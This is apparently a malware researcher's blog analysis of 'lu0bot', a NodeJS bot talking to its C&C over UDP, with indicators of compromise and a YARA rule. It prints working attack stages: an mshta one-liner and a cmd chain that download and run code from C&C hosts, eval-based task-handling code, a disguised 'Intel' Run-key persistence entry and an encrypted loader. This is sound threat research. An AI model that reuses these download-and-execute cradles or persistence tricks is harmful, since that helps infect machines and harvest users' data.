Normal view

There are new articles available, click to refresh the page.
Before yesterdayMalware

Lu0bot – An unknown NodeJS malware using UDP

By: fumko
24 June 2021 at 08:37

In February/March 2021, A curious lightweight payload has been observed from a well-known load seller platform. At the opposite of classic info-stealers being pushed at an industrial level, this one is widely different in the current landscape/trends. Feeling being in front of a grey box is somewhat a stressful problem, where you have no idea about what it could be behind and how it works, but in another way, it also means that you will learn way more than a usual standard investigation.

I didn’t feel like this since Qulab and at that time, this AutoIT malware gave me some headaches due to its packer. but after cleaning it and realizing it’s rudimentary, the challenge was over. In this case, analyzing NodeJS malware is definitely another approach.

I will just expose some current findings of it, I don’t have all answers, but at least, it will door opened for further researches.

Disclaimer: I don’t know the real name of this malware.

Minimalist C/C++ loader

When lu0bot is deployed on a machine, the first stage is a 2.5 ko lightweight payload which has only two section headers.

Curious PE Sections

Written in C/C++, only one function has been developped.

void start()
{
  char *buff; 

  buff = CmdLine;
  do
  {
    buff -= 'NPJO';      // The key seems random after each build
    buff += 4;        
  }
  while ( v0 < &CmdLine[424] );
  WinExec(CmdLine, 0);   // ... to the moon ! \o/
  ExitProcess(0);
}

This rudimentary loop is focused on decrypting a buffer, unveiling then a one-line JavaScript code executed through WinExec()

Simple sub loop for unveiling the next stage

Indeed, MSHTA is used executing this malicious script. So in term of monitoring, it’s easy to catch this interaction.

mshta "javascript: document.write();
42;
y = unescape('%312%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%321%616%654%62%7E%321%32').split('~');
103;
try {
    x = 'WinHttp';
    127;
    x = new ActiveXObject(x + '.' + x + 'Request.5.1');
    26;
    x.open('GET', y[1] + '&a=' + escape(window.navigator.userAgent), !1);
    192;
    x.send();
    37;
    y = 'ipt.S';
    72;
    new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);
    179;
} catch (e) {};
234;;
window.close();"

Setting up NodeJs

Following the script from above, it is designed to perform an HTTP GET request from a C&C (let’s say it’s the first C&C Layer). Then the response is executed as an ActiveXObject.

new ActiveXObject('WScr' + y + 'hell').Run(unescape(unescape(x.responseText)), 0, !2);

Let’s inspect the code (response) step by step

cmd /d/s/c cd /d "%ALLUSERSPROFILE%" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe [...]
  • Set the console into %ALLUSERPROFILE% path
  • Create fake folder DNTException
[...] || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);
           x.Open("GET",unescape(WScript.Arguments(0^)^),false^);
           x.Send(^);
           b = new ActiveXObject("ADODB.Stream"^);
           b.Type=1;
           b.Open(^);
           b.Write(x.ResponseBody^);
           b.SaveToFile(WScript.Arguments(1^),2^); 
           > get1618489872131.txt 
           & cscript /nologo /e:jscript get1618489872131.txt "http://hri2.xyz/hri/?%HEXVALUE%&b=%HEXVALUE%" node.cab 
           & expand node.cab node.exe 
           & del get1618489872131.txt node.cab 
) [...]
  • Generate a js code-focused into downloading a saving an archive that will be named “node.cab”
  • Decompress the cab file with expand command and renamed it “node.exe”
  • Delete all files that were generated when it’s done
[...] & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1618489872131.txt [...]
  • Recreate a js script that will execute again some code
[...] cscript /nologo /e:jscript get1618489872131.txt "node -e eval(FIRST_STAGE_NODEJS_CODE)" & del get1618489872131.txt [...]

In the end, this whole process is designed for retrieving the required NodeJS runtime.

Lu0bot nodejs loader initialization process

Matryoshka Doll(J)s

Luckily the code is in fact pretty well written and comprehensible at this layer. It is 20~ lines of code that will build the whole malware thanks to one and simple API call: eval.

implistic lu0bot nodejs loader that is basically the starting point for everything


From my own experience, I’m not usually confronted with malware using UDP protocol for communicating with C&C’s. Furthermore, I don’t think in the same way, it’s usual to switch from TCP to UDP like it was nothing. When I analyzed it for the first time, I found it odd to see so many noisy interactions in the machine with just two HTTP requests. Then I realized that I was watching the visible side of a gigantic iceberg…

Well played OwO

For those who are uncomfortable with NodeJS, the script is designed to sent periodically UDP requests over port 19584 on two specific domains. When a message is received, it is decrypted with a standard XOR decryption loop, the output is a ready-to-use code that will be executed right after with eval. Interestingly the first byte of the response is also part of the key, so it means that every time a response is received, it is likely dynamically different even if it’s the same one.

In the end, lu0bot is basically working in that way

lu0bot nodejs malware architecture

After digging into each code executed, It really feels that you are playing with matryoshka dolls, due to recursive eval loops unveiling more content/functions over time. It’s also the reason why this malware could be simple and complex at the same time if you aren’t experienced with this strategy.

The madness philosophy behind eval() calls

For adding more nonsense it is using different encryption algorithms whatever during communications or storing variables content:

  • XOR
  • AES-128-CBC
  • Diffie-Hellman
  • Blowfish

Understanding Lu0bot variables

S (as Socket)

  • Fundamental Variable
  • UDP communications with C&C’s
  • Receiving main classes/variables
  • Executing “main branches” code
function om1(r,q,m)      # Object Message 1
 |--> r # Remote Address Information
 |--> q # Query 
 |--> m # Message

function c1r(m,o,d)       # Call 1 Response
 |--> m # Message
 |--> o # Object
 |--> d # Data

function sc/c1/c2/c3(m,r) # SetupCall/Call1/Call2/Call3
 |--> m # Message
 |--> r # Remote Address Information

function ss(p,q,c,d)      # ScriptSetup / SocketSetup
 |--> p # Personal ID
 |--> q # Query 
 |--> c # Crypto/Cipher
 |--> d # Data

function f()              # UDP C2 communications

KO (as Key Object ?)

  • lu0bot mastermind
  • Containing all bot information
    • C&C side
    • Client side
  • storing fundamental handle functions for task manager(s)
    • eval | buffer | file
ko {
    pid:     # Personal ID
    aid:     # Address ID (C2)
    q:       # Query
    t:       # Timestamp
    lq: {
             # Query List
    },
    pk:      # Public Key
    k:       # Key
    mp: {},  # Module Packet/Package 
    mp_new: [Function: mp_new],        # New Packet/Package in the queue
    mp_get: [Function: mp_get],        # Get Packet/Package from the queue
    mp_count: [Function: mp_count],    # Packer/Package Counter
    mp_loss: [Function: mp_loss],      # ???
    mp_del: [Function: mp_del],        # Delete Packet/Package from the queue
    mp_dtchk: [Function: mp_dtchk],    # Data Check
    mp_dtsum: [Function: mp_dtsum],    # Data Sum
    mp_pset: [Function: mp_pset],      # Updating Packet/Package from the queue
    h: {                               # Handle
        eval: [Function],              
        bufwrite: [Function],
        bufread: [Function],
        filewrite: [Function],
        fileread: [Function]
    },
    mp_opnew: [Function: mp_opnew],    # Create New
    mp_opstat: [Function: mp_opstat],  # get stats from MP
    mp_pget: [Function],               # Get Packet/Package from MP
    mp_pget_ev: [Function]             # Get Packet/Package Timer Intervals
}

MP

  • Module Package/Packet/Program ?
  • Monitoring and logging an executed task/script.
mp:                              
   { key:                        # Key is Personal ID
      { id:  ,                   # Key ID (Event ID)
        pid: ,                   # Personal ID
        gen:  ,                  # Starting Timestamp
        last: ,                  # Last Tick Update
        tmr: [Object],           # Timer
        p: {},                   # Package/Packet
        psz:                     # Package/Packet Size
        btotal:                  # ???
        type: 'upload',          # Upload/Download type
        hn: 'bufread',           # Handle name called
        target: 'binit',         # Script name called (From C&C)
        fp: ,                    # Buffer
        size: ,                  # Size
        fcb: [Function],         # FailCallBack
        rcb: [Function],         # ???
        interval: 200,           # Internval Timer
        last_sev: 1622641866909, # Last Timer Event
        stmr: false              # Script Timer
}

Ingenious trick for calling functions dynamically

Usually, when you are reversing malware, you are always confronted (or almost every time) about maldev hiding API Calls with tricks like GetProcAddress or Hashing.

function sc(m, r) {
    if (!m || m.length < 34) return;
    m[16] ^= m[2];
    m[17] ^= m[3];
    var l = m.readUInt16BE(16);
    if (18 + l > m.length) return;
    var ko = s.pk[r.address + ' ' + r.port];
    var c = crypto.createDecipheriv('aes-128-cbc', ko.k, m.slice(0, 16));
    m = Buffer.concat([c.update(m.slice(18, 18 + l)), c.final()]);
    m = {
        q: m.readUInt32BE(0),
        c: m.readUInt16BE(4),
        ko: ko,
        d: m.slice(6)
    };
    l = 'c' + m.c;        // Function name is now saved
    if (s[l]) s[l](m, r);
}


As someone that is not really experienced in the NodeJS environment, I wasn’t really triggering the trick performed here but for web dev, I would believe this is likely obvious (or maybe I’m wrong). The thing that you need to really take attention to is what is happening with “c” char and m.c.

By reading the official NodeJs documemtation: The Buffer.readUInt16BE() method is an inbuilt application programming interface of class Buffer within the Buffer module which is used to read 16-bit value from an allocated buffer at a specified offset.

Buffer.readUInt16BE( offset )

In this example it will return in a real case scenario the value “1”, so with the variable l, it will create “c1” , a function stored into the global variable s. In the end, s[“c1”](m,r) is also meaning s.c1(m,r).

A well-done task manager architecture

Q variable used as Macro PoV Task Manager

  • “Q” is designed to be the main task manager.
  • If Q value is not on LQ, adding it into LQ stack, then executing the code content (with eval) from m (message).
if (!lq[q]) {                               // if query not in the queue, creating it
    lq[q] = [0, false];
    setTimeout(function() {
        delete lq[q]
    }, 30000);
    try {
        for (var p = 0; p < m.d.length; p++)
            if (!m.d[p]) break;
        var es = m.d.slice(0, p).toString(); // es -> Execute Script
        m.d = m.d.slice(p + 1);
        if (!m.d.length) m.d = false;
        eval(es)                             // eval, our sweat eval...
    } catch (e) {
        console.log(e);
    }
    return;
}
if (lq[q][0]) {
    s.ss(ko.pid, q, 1, lq[q][1]);
}

MP variable used as Micro PoV Task Manager

  • “MP” is designed to execute tasks coming from C&C’s.
  • Each task is executed independantly!
function mp_opnew(m) {

    var o = false;                       // o -> object
    try {
        o = JSON.parse(m.d);             // m.d (message.data) is saved into o
    } catch (e) {}
    if (!o || !o.id) return c1r(m, -1);  // if o empty, or no id, returning -1 
    if (!ko.h[o.hn]) return c1r(m, -2);  // if no functions set from hn, returning -2
    var mp = ko.mp_new(o.id);            // Creating mp ---------------------------
    for (var k in o) mp[k] = o[k];                                                |
    var hr = ko.h[o.hn](mp);                                                      |
    if (!hr) {                                                                    |
        ko.mp_del(mp);                                                            |
        return c1r(m, -3)                // if hr is incomplete, returning -3     |
    }                                                                             |
    c1r(m, hr);                          // returning hr                          |                                                                                             
}                                                                                 |
                                                                                  |
function mp_new(id, ivl) {    <----------------------------------------------------
    var ivl = ivl ? ivl : 5000;          // ivl -> interval
    var now = Date.now();        
    if (!lmp[id]) lmp[id] = {            // mp list 
        id: id,
        pid: ko.pid,
        gen: now,
        last: now,
        tmr: false,
        p: {},
        psz: 0,
        btotal: 0
    };
    var mp = lmp[id];
    if (!mp.tmr) mp.tmr = setInterval(function() {
        if (Date.now() - mp.last > 1000 * 120) {
            ko.mp_del(id);
            return;
        }
        if (mp.tcb) mp.tcb(mp);
    }, ivl);
    mp.last = now;
    return mp;
}

O (Object) – C&C Task

This object is receiving tasks from the C&C. Technically, this is (I believed) one of the most interesting variable to track with this malware..

  • It contains 4 or 5 values
    • type.
      • upload
      • download
    • hn : Handle Name
    • sz: Size (Before Zlib decompression)
    • psz: ???
    • target: name of the command/script received from C&C
// o content
{ 
        id: 'XXXXXXXXXXXXXXXXX',
        type: 'upload',
        hn: 'eval',
        sz: 9730,
        psz: 1163,
        target: 'bootstrap-base.js',
} 

on this specific scenario, it’s uploading on the bot a file from the C&C called “bootstrap-base.js” and it will be called with the handle name (hn) function eval.

Summary

Aggressive telemetry harvester

Usually, when malware is gathering information from a new bot it is extremely fast but here for exactly 7/8 minutes your VM/Machine is literally having a bad time.

Preparing environment

Gathering system information

Process info
tasklist /fo csv /nh
wmic process get processid,parentprocessid,name,executablepath /format:csv
qprocess *
Network info
ipconfig.exe /all
route.exe print
netstat.exe -ano
systeminfo.exe /fo csv
Saving Environment & User path(s)
Saving environment variables EI_HOME (EI = EINFO)
EI_DESKTOP
  |--> st.env['EI_HOME'] + '\\Desktop';
EI_DOCUMENTS 
  |--> st.env['EI_HOME'] + '\\Documents';
  |--> st.env['EI_HOME'] + '\\My Documents';
EI_PROGRAMFILES1
  |--> var tdir1 = exports.env_get('ProgramFiles');
  |--> var tdir2 = exports.env_get('ProgramFiles(x86)');
  |--> st.env['EI_HOME'].substr(0,1) + '\\Program Files (x86)';
EI_PROGRAMFILES2
  |--> var tdir3 = exports.env_get('ProgramW6432');
  |--> st.env['EI_HOME'].substr(0,1) + '\\Program Files';
EI_DOWNLOADS
  |-->  st.env['EI_HOME'] + '\\Downloads';
Console information

These two variables are basically conditions to check if the process was performed. (ISCONPROBED is set to true when the whole thing is complete).

env["ISCONPROBED"] = false;
env["ISCONSOLE"] = true;

Required values for completing the task..

env["WINDIR"] = val;
env["TEMP"] = val;
env["USERNAME_RUN"] = val;
env["USERNAME"] =  val;
env["USERNAME_SID"] = s;
env["ALLUSERSPROFILE"] = val;
env["APPDATA"] = val;

Checking old windows versions

Curiously, it’s checking if the bot is using an old Microsoft Windows version.

  • NT 5.X – Windows 2000/XP
  • NT 6.0 – Vista
function check_oldwin(){
    var osr = os.release();

    if(osr.indexOf('5.')===0 || osr.indexOf('6.0')===0) return osr;

    return false;
}
exports.check_oldwin = check_oldwin;

This is basically a condition after for using an alternative command with pslist

function ps_list_alt(cb){
    var cmd = ['qprocess','*'];
    if(check_oldwin()) cmd.push('/system');
   ....

Checking ADS streams for hiding content into it for later

Checking Alternative Data Streams

Harvesting functions 101

bufstore_save(key,val,opts)         # Save Buffer Storage 
bufstore_get(key,clear)             # Get Buffer Storage 
strstrip(str)                       # String Strip
name_dirty_fncmp(f1,f2)             # Filename Compare (Dirty)
dirvalidate_dirty(file)             # Directory Checking (Dirty)
file_checkbusy(file)                # Checking if file is used
run_detached(args,opts,show)        # Executing command detached
run(args,opts,cb)                   # Run command
check_oldwin()                      # Check if Bot OS is NT 5.0 or NT 6.0
ps_list_alt(cb)                     # PS List (Alternative way)
ps_list_tree(list,results,opts,pid) # PS List Tree
ps_list(arg,cb)                     # PS list 
ps_exist(pid)                       # Check if PID Exist
ps_kill(pid)                        # Kill PID
reg_get_parse(out)                  # Parsing Registry Query Result
reg_hkcu_get()                      # Get HKCU
reg_hkcu_replace(path)              # Replace HKCU Path
reg_get(key,cb)                     # Get Content
reg_get_dir(key,cb)                 # Get Directory
reg_get_key(key,cb)                 # Get SubKey
reg_set_key(key,value,type,cb)      # Set SubKey
reg_del_key(key,force,cb)           # Del SubKey
get_einfo_1(ext,cb)                 # Get EINFO Step 1
dirlistinfo(dir,limit)              # Directory Listing info 
get_einfo_2(fcb)                    # Get EINFO Step 2
env_get(key,kv,skiple)              # Get Environment
console_get(cb)                     # Get Console environment variables
console_get_done(cb,err)            # Console Try/Catch callback
console_get_s0(ccb)                 # Console Step 0
console_get_s1(ccb)                 # Console Step 1
console_get_s2(ccb)                 # Console Step 2
console_get_s3(ccb)                 # Console Step 3
ads_test()                          # Checking if bot is using ADS streams
diskser_get_parse(dir,out)          # Parse Disk Serial command results
diskser_get(cb)                     # Get Disk Serial
prepare_dirfile_env(file,cb)        # Prepare Directory File Environment
prepare_file_env(file,cb)           # Prepare File Environment
hash_md5_var(val)                   # MD5 Checksum
getosinfo()                         # Get OS Information
rand(min, max)                      # Rand() \o/
ipctask_start()                     # IPC Task Start (Interprocess Communication)
ipctask_tick()                      # IPC Task Tick (Interprocess Communication)
baseinit_s0(cb)                     # Baseinit Step 0
baseinit_s1(cb)                     # Baseinit Step 1
baseinit_s2(cb)                     # Baseinit Step 2
baseinit_einfo_1_2(cb)              # Baseinit EINFO

Funky Persistence

The persistence is saved in the classic HKCU Run path

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Intel Management Engine Components 4194521778"="wscript.exe /t:30 /nologo /e:jscript \"C:\ProgramData\Intel\Intel(R) Management Engine Components\Intel MEC 750293792\" \"C:\ProgramData\Intel\Intel(R) Management Engine Components\" 2371015226"

Critical files are stored into a fake “Intel” folder in ProgramData.

ProgramData
    |-- Intel
        |--  Intel(R) Management Engine Components
            |--> Intel MEC 246919961
            |--> Intel MEC 750293792

Intel MEC 750293792

new ActiveXObject("WScript.shell").Run('"C:\ProgramData\DNTException\node.exe" "' + WScript.Arguments(0) + '\Intel MEC 246919961" ' + WScript.Arguments(1), 0, false);

Intel MEC 246919961

var c = new Buffer((process.argv[2] + 38030944).substr(0, 8));
c = require("crypto").createDecipheriv("bf", c, c);
global["\x65\x76" + "\x61\x6c"](Buffer.concat([c.update(new Buffer("XSpPi1eP/0WpsZRcbNXtfiw8cHqIm5HuTgi3xrsxVbpNFeB6S6BXccVSfA/JcVXWdGhhZhJf4wHv0PwfeP1NjoyopLZF8KonEhv0cWJ7anho0z6s+0FHSixl7V8dQm3DTlEx9zw7nh9SGo7MMQHRGR63gzXnbO7Z9+n3J75SK44dT4fNByIDf4rywWv1+U7FRRfK+GPmwwwkJWLbeEgemADWttHqKYWgEvqEwrfJqAsKU/TS9eowu13njTAufwrwjqjN9tQNCzk5olN0FZ9Cqo/0kE5+HWefh4f626PAubxQQ52X+SuUqYiu6fiLTNPlQ4UVYa6N61tEGX3YlMLlPt9NNulR8Q1phgogDTEBKGcBlzh9Jlg3Q+2Fp84z5Z7YfQKEXkmXl/eob8p4Putzuk0uR7/+Q8k8R2DK1iRyNw5XIsfqhX3HUhBN/3ECQYfz+wBDo/M1re1+VKz4A5KHjRE+xDXu4NcgkFmL6HqzCMIphnh5MZtZEq+X8NHybY2cL1gnJx6DsGTU5oGhzTh/1g9CqG6FOKTswaGupif+mk1lw5GG2P5b5w==", "\x62\x61\x73" + "\x65\x36\x34")), c.final()]).toString());

The workaround is pretty cool in the end

  • WScript is launched after waiting for 30s
  • JScript is calling “Intel MEC 750293792”
  • “Intel MEC 750293792” is executing node.exe with arguments from the upper layer
  • This setup is triggering the script “Intel MEC 246919961”
    • the Integer value from the upper layer(s) is part of the Blowfish key generation
    • global[“\x65\x76” + “\x61\x6c”] is in fact hiding an eval call
    • the encrypted buffer is storing the lu0bot NodeJS loader.

Ongoing troubleshooting in production ?

It is possible to see in some of the commands received, some lines of codes that are disabled. Unknown if it’s intended or no, but it’s pretty cool to see about what the maldev is working.

It feels like a possible debugging scenario for understanding an issue.

Outdated NodeJS still living and kickin’

Interestingly, lu0bot is using a very old version of node.exe, way older than could be expected.

node.exe used by lu0bot is an outdated one

This build (0.10.48), is apparently from 2016, so in term of functionalities, there is a little leeway for exploiting NodeJS, due that most of its APIs wasn’t yet implemented at that time.

NodeJs used is from a 2016 build.
I feel old by looking the changelog…

The issue mentioned above is “seen” when lu0bot is pushing and executing “bootstrap-base.js“. On build 0.10.XXX, “Buffer” wasn’t fully implemented yet. So the maldev has implemented missing function(s) on this specific version, I found this “interesting”, because it means it will stay with a static NodeJS runtime environment that won’t change for a while (or likely never). This is a way for avoiding cryptography troubleshooting issues, between updates it could changes in implementations that could break the whole project. So fixed build is avoiding maintenance or unwanted/unexpected hotfixes that could caused too much cost/time consumption for the creator of lu0bot (everything is business \o/).

Interesting module version value in bootstrap-base.js

Of course, We couldn’t deny that lu0bot is maybe an old malware, but this statement needs to be taken with cautiousness.

By looking into “bootstrap-base.js”, the module is apparently already on version “6.0.15”, but based on experience, versioning is always a confusing thing with maldev(s), they have all a different approach, so with current elements, it is pretty hard to say more due to the lack of samples.

What is the purpose of lu0bot ?

Well, to be honest, I don’t know… I hate making suggestions with too little information, it’s dangerous and too risky. I don’t want to lead people to the wrong path. It’s already complicated to explain something with no “public” records, even more, when it is in a programming language for that specific purpose. At this stage, It’s smarter to focus on what the code is able to do, and it is certain that it’s a decent data collector.

Also, this simplistic and efficient NodeJS loader code saved at the core of lu0bot is basically everything and nothing at the same time, the eval function and its multi-layer task manager could lead to any possibilities, where each action could be totally independent of the others, so thinking about features like :

  • Backdoor ?
  • Loader ?
  • RAT ?
  • Infostealer ?

All scenario are possible, but as i said before I could be right or totally wrong.

Where it could be seen ?

Currently, it seems that lu0bot is pushed by the well-known load seller Garbage Cleaner on EU/US Zones irregularly with an average of possible 600-1000 new bots (each wave), depending on the operator(s) and days.

Appendix

IoCs

IP

  • 5.188.206[.]211

lu0bot loader C&C’s (HTTP)

  • hr0[.]xyz
  • hr1[.]xyz
  • hr2[.]xyz
  • hr3[.]xyz
  • hr4[.]xyz
  • hr5[.]xyz
  • hr6[.]xyz
  • hr7[.]xyz
  • hr8[.]xyz
  • hr9[.]xyz
  • hr10[.]xyz

lu0bot main C&C’s (UDP side)

  • lu00[.]xyz
  • lu01[.]xyz
  • lu02[.]xyz
  • lu03[.]xyz

Yara

rule lu0bot_cpp_loader
{
    meta:
        author = "Fumik0_"
        description = "Detecting lu0bot C/C++ lightweight loader"

    strings:
        $hex_1 = {
            BE 00 20 40 00 
            89 F7 
            89 F0
            81 C7 ?? 01 00 00 
            81 2E ?? ?? ?? ?? 
            83 C6 04 
            39 FE 
            7C ?? 
            BB 00 00 00 00 
            53 50 
            E8 ?? ?? ?? ??
            E9 ?? ?? ?? ??
        }
    
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and
        (filesize > 2KB and filesize < 5KB) and 
        any of them
    
}

IoCs

fce3d69b9c65945dcfbb74155f2186626f2ab404e38117f2222762361d7af6e2  Lu0bot loader.exe
c88e27f257faa0a092652e42ac433892c445fc25dd445f3c25a4354283f6cdbf  Lu0bot loader.exe
b8b28c71591d544333801d4673080140a049f8f5fbd9247ed28064dd80ef15ad  Lu0bot loader.exe
5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f  Lu0bot loader.exe
f186c2ac1ba8c2b9ab9b99c61ad3c831a6676728948ba6a7ab8345121baeaa92  Lu0bot loader.exe


8d8b195551febba6dfe6a516e0ed0f105e71cf8df08d144b45cdee13d06238ed  response1.bin
214f90bf2a6b8dffa8dbda4675d7f0cc7ff78901b3c3e03198e7767f294a297d  response2.bin
c406fbef1a91da8dd4da4673f7a1f39d4b00fe28ae086af619e522bc00328545  response3.bin

ccd7dcdf81f4acfe13b2b0d683b6889c60810173542fe1cda111f9f25051ef33  Intel MEC 246919961
e673547a445e2f959d1d9335873b3bfcbf2c4de2c9bf72e3798765ad623a9067  Intel MEC 750293792

Example of lu0bot interaction


ko
{ pid: 'XXXXXX',
  aid: '5.188.206.211 19584',
  q: XXXXXXXXXX, 
  t: XXXXXXXXXXXXX,
  lq: 
   { ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
     ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ] },
  pk: 'BASE64_ENCRYPTED',
  k: <Buffer 3c 60 22 73 97 cc 76 22 bc eb b5 79 46 3d 05 9e>,
  mp: 
   { XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,i
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function],
        interval: 200,
        last_sev: XXXXXXXXXXXXX,
        stmr: false },
     XXXXXXXXXXXX: 
      { id: 'XXXXXXXXXXXX',
        pid: 'XXXXXXX',
        gen: XXXXXXXXXXXXX,
        last: XXXXXXXXXXXXX,
        tmr: [Object],
        p: {},
        psz: 1163,
        btotal: 0,
        type: 'download',
        hn: 'bufread',
        target: 'binit',
        fp: <Buffer 1f 8b 08 00 00 00 00 00 00 0b 95 54 db 8e 9b 30 10 fd 95 c8 4f ad 44 91 31 c6 80 9f 9a 26 69 1b 29 9b 8d b2 59 f5 a1 54 91 81 a1 41 21 18 61 92 6d bb c9 ...>,
        size: 798,
        fcb: [Function],
        rcb: [Function] } },
  h: 
   { eval: [Function],
     bufwrite: [Function],
     bufread: [Function],
     filewrite: [Function],
     fileread: [Function] },
  mp_pget: [Function],
  mp_pget_ev: [Function],
  mp_new: [Function: mp_new],
  mp_get: [Function: mp_get],
  mp_count: [Function: mp_count],
  mp_loss: [Function: mp_loss],
  mp_del: [Function: mp_del],
  mp_dtchk: [Function: mp_dtchk],
  mp_dtsum: [Function: mp_dtsum],
  mp_pset: [Function: mp_pset],
  mp_opnew: [Function: mp_opnew],
  mp_opstat: [Function: mp_opstat] }
lq
{ ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 30 00 00 00 00 09 00 00 26 02> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 74 72 75 65> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 37 39 38> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
  ' XXXXXXXXXXXXX': [ 1, <Buffer 31> ],
